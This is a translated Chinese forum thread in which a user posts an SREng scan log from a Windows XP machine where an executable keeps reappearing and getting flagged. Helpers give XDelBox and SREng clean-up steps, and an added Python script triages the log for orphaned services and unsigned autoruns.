    [C:\Program Files\Windows Live\Messenger\custsat.dll]  [Microsoft Corporation, 9.0. (srv03_sp1_qfe.3)]
    [C:\Program Files\Windows Live\Messenger\abssm.dll]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl]  [Kaspersky Lab, 7.0.1.325]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
    [C:\WINDOWS\system32\SOGOUPY.IME]  [ Inc., 3, 1, 0, 0]
    [C:\Program Files\SogouInput\Plugin\SgImeWord.dll]  [, 1, 0, 0, 31]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx]  [Adobe Systems, Inc., 9,0,115,0]
[PID: 2272 / cyscys][C:\WINDOWS\system32\taskmgr.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 3904 / cyscys][D:\Program Files\maxthon\Maxthon.exe]  [Maxthon International Ltd., 1, 5, 9, 80]
    [D:\Program Files\maxthon\maxzlib.dll]  [ , 1, 0, 0, 2]
    [C:\WINDOWS\system32\odbcbcp.dll]  [Microsoft Corporation, 7.00 (xpsp_sp2_rtm.8)]
    [D:\Program Files\maxthon\Services\RealTime\real_time.dll]  [, 1, 0, 0, 1]
    [C:\WINDOWS\system32\SOGOUPY.IME]  [ Inc., 3, 1, 0, 0]
    [C:\Program Files\SogouInput\Plugin\SgImeWord.dll]  [, 1, 0, 0, 31]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\nfio.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\fsdrvplg.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\FSSync.dll]  [Kaspersky Lab, 7.0.5.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\basegui.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\thpimpl.ppl]  [Kaspersky Lab, 7.0.1.325]
    [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\winreg.ppl]  [Kaspersky Lab, 7.0.1.325]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
[PID: 2148 / cyscys][D:\Program Files\sreng2\SREngLdr.EXE]  [Smallfrogs Studio, 2.6.12.1018]
[PID: 2280 / cyscys][D:\Program Files\sreng2\SRE5408720f.EXE]  [Smallfrogs Studio, 2.6.12.1018]
    [D:\Program Files\sreng2\Upload\3rdUpd.DLL]  [Smallfrogs Studio, 2, 1, 0, 15]
==================================
File Associations
.TXT  Error. [C:\WINDOWS\notepad.exe %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  Error. ["hh.exe" %1]
.HLP  OK. [%SystemRoot%\system32\winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.VBS  Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.JS   Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.LNK  OK. [{0-}]
==================================
Winsock Providers
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS File
127.0.0.1       localhost
==================================
Process Privilege Scan
Special privilege allowed: SeLoadDriverPrivilege [PID = 520, C:\PROGRAM FILES\CFOSSPEED\CFOSSPEED.EXE]
Special privilege allowed: SeLoadDriverPrivilege [PID = 604, D:\PROGRAM FILES\ALFACLOCK\ALFACLOCK.EXE]
Special privilege allowed: SeLoadDriverPrivilege [PID = 632, C:\PROGRAM FILES\WINTOOLS\RAM SAVER PRO\RAMSAVERPRO.EXE]
Special privilege allowed: SeLoadDriverPrivilege [PID = 728, C:\PROGRAM FILES\CFOSSPEED\SPD.EXE]
Special privilege allowed: SeLoadDriverPrivilege [PID = 2172, D:\PROGRAM FILES\BITSPIRIT\BITSPIRIT.EXE]
Special privilege allowed: SeLoadDriverPrivilege [PID = 3904, D:\PROGRAM FILES\MAXTHON\MAXTHON.EXE]
Special privilege allowed: SeLoadDriverPrivilege [PID = 2148, D:\PROGRAM FILES\SRENG2\SRENGLDR.EXE]
==================================
API HOOK
N/A
==================================
Hidden Processes
N/A
==================================
[This post was last edited by 秋叶濛濛 at 09:52]
1. We suggest using XDelBox to delete the following files:
Instructions: copy the paths of all the files to be deleted, right-click in the pending-deletion list and choose "Import from clipboard without checking paths"; after importing, right-click the file to be deleted and choose "Reboot and delete now". The computer will reboot into a DOS screen to carry out the deletion. Before running XDelBox it is best to disconnect all removable storage (USB drives, MP3 players, phone memory cards, etc.).
C:\Program Files\Internet
2. After the deletion and reboot, use SREng to repair the following:
Startup Items -- Services -- Win32 service applications: disable this entry:
[Clip Book server / Clip Book server][Stopped/Auto Start]
   <C:\Program Files\Internet ><(File is missing)>
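A log like the one above is read the same way every time: find registered services and drivers whose binary is gone, drivers loaded from something other than a .sys, and autoruns that carry no publisher at all. The script below is an added example, not code from the thread or from SREng. It assumes SREng's line layout as reconstructed above (a section heading on its own line, service and driver entries as "[Display name / Service name][State]" followed by an indented "<image><company>" line, registry autoruns as "<value><data>  [publisher]") and runs on a constructed excerpt of the posted log.

```python
"""Triage of an SREng log: flag the entries a responder looks at first.

Added example, not code from the thread or from SREng.  Assumes the log layout
reconstructed above: section heading on its own line, service/driver entries as
"[Display name / Service name][State]" plus an indented "<image><company>" line,
registry autoruns as "<value><data>  [publisher]".  SAMPLE_LOG is a constructed
excerpt of the posted log.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SECTION_RE = re.compile(r"^(Registry|Startup Folder|Services|Drivers|Browser Add-ons|Running Processes)$")
ENTRY_RE = re.compile(r"^\[(?P<name>[^\]]*)\]\[(?P<state>[^\]]*)\]\s*$")
IMAGE_RE = re.compile(r"^\s*<(?P<image>.*)><(?P<company>.*)>\s*$")
VALUE_RE = re.compile(r"^\s*<(?P<value>[^>]*)><(?P<data>.*)>\s*\[(?P<publisher>.*)\]\s*$")


@dataclass
class Finding:
    section: str
    name: str
    image: str
    reason: str


def triage(log_text: str) -> List[Finding]:
    """Walk the log once, remembering the current section and the service/driver
    header whose image line has not been seen yet."""
    findings: List[Finding] = []
    section: Optional[str] = None
    pending: Optional[Tuple[str, str]] = None      # (name, state) awaiting its image line
    for line in log_text.splitlines():
        stripped = line.strip()
        if SECTION_RE.match(stripped):
            section, pending = stripped, None
            continue
        m = ENTRY_RE.match(line)
        if m and section in ("Services", "Drivers"):
            pending = (m["name"], m["state"])
            continue
        m = IMAGE_RE.match(line)
        if m and pending is not None:
            name, state = pending
            pending = None
            image, company = m["image"].strip(), m["company"].strip()
            if "File is missing" in image or "File is missing" in company:
                # registered service whose binary is gone: leftover of a removal
                # (the moderator's conclusion here) or a dropper waiting to return
                findings.append(Finding(section, name, image, f"image missing, entry still {state}"))
            elif section == "Drivers" and not image.lower().endswith(".sys"):
                # kernel code loaded from a non-.sys file deserves a second look
                findings.append(Finding(section, name, image, "driver image is not a .sys file"))
            continue
        m = VALUE_RE.match(line)
        if m and section == "Registry" and m["data"].strip():
            if m["publisher"].strip() in ("", "N/A"):
                findings.append(Finding(section, m["value"], m["data"].strip(),
                                        "autorun without publisher information"))
    return findings


# Constructed excerpt of the posted log, in the layout described above.
SAMPLE_LOG = r"""Startup Items
Registry
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <AVP><"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe">  [(Verified)Kaspersky Lab]
    <RAMSaverPro><c:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe>  []
Services
[Clip Book server / Clip Book server][Stopped/Auto Start]
   <C:\Program Files\Internet ><(File is missing)>
[Cmb WebProtect Support / CMBWPS][Running/Auto Start]
   <C:\Program Files\CMBCHINA\WebProtect\WPService.exe /start><China Merchants Bank>
Drivers
[CMB8100 / CMB8100][Running/Auto Start]
   <\??\C:\WINDOWS\system32\Drivers\CertClient.dat><N/A>
[klif / klif][Running/System Start]
   <\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.section}] {f.name}: {f.reason} ({f.image})")
```

On the excerpt it reports the Clip Book server entry (missing binary, still set to auto start), the CMB8100 driver loaded from a .dat, and the RAMSaverPro autorun with an empty publisher; the Kaspersky entries pass. Feed it the whole log and the hit list is the set of entries to look up before touching anything.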
--------------------------------------------------------------
C:\WINDOWS\explorer.exe
C:\WINDOWS\Explorer.EXE
Upload these two for scanning.
No problem there; it is a trace left by XDELBOX.
EXPLORER.EXE 1/36, only Rising flags it as a virus.
C:\Program Files\Internet
is an xdelbox leftover.
Can't see anything else.
Download Windows清理助手 (Windows Cleanup Assistant) and run a clean-up.
The thing is, apart from what I described in the first post there is no other sign of infection at all, and the machine runs fine after boot; only after a while does an EXE suddenly appear and get flagged. So frustrating.
Still asking for help~~~ experts please come